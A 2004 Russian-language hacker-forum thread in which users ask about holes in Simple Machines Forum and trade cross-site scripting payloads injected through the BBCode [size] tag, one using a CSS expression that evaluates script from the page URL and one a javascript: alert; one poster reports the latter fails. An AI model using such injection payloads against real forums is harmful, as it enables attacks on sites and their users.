Вопрос про уязвимости в Simple machines forum

Discussion in 'Песочница' started by Guest, 19 Aug 2004.

  1. Guest

    Guest Guest

    Reputations:
    0
    Кто знает дырки в нем есть
     
  2. Sky

    Sky New Member

    Joined:
    26 Aug 2004
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    И что мона с этим сотварить?</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

    [size=expression(eval(unescape(document.URL.substring(document.URL.
    length-41,document.URL.length))))]Big Exploit[/size]

    [/QUOTE]<span id='postcolor'>
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Вставить скрипт...
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    [size=javascript:alert('LOL');]LOL[/size]
    [/QUOTE]<span id='postcolor'>
    Это чисто пример ...
     
  4. Sky

    Sky New Member

    Joined:
    26 Aug 2004
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ августа 26 2004,22:40)</td></tr><tr><td id="QUOTE">Вставить скрипт...
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
    [size=javascript:alert('LOL');]LOL[/size]
    [/QUOTE]<span id='postcolor'>
    Это чисто пример ...[/QUOTE]<span id='postcolor'>
    Спасибо тебе конечно за пример но он не прокатывает [​IMG]
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Ты же написал, что не фильтруются данные ...
    Смотри по форуму конкретному ...